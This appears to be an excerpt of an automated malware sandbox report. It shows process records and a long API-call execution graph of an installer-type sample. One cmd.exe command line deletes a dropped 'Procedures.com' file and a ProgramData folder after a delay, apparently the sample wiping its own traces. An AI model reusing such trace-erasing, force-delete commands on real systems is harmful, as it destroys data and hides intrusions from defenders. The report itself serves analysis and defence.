                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                                                                  Start time:00:24:55
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                                                                                  Start time:00:24:55
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                                                                                  Start time:00:24:55
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                  Imagebase:0xb70000
                                                                                                                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                    Execution Coverage:17.5%
                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                    Signature Coverage:21%
                                                                                                                                                                                                                                                                                                    Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:25
                                                                                                                                                                                                                                                                                                    execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 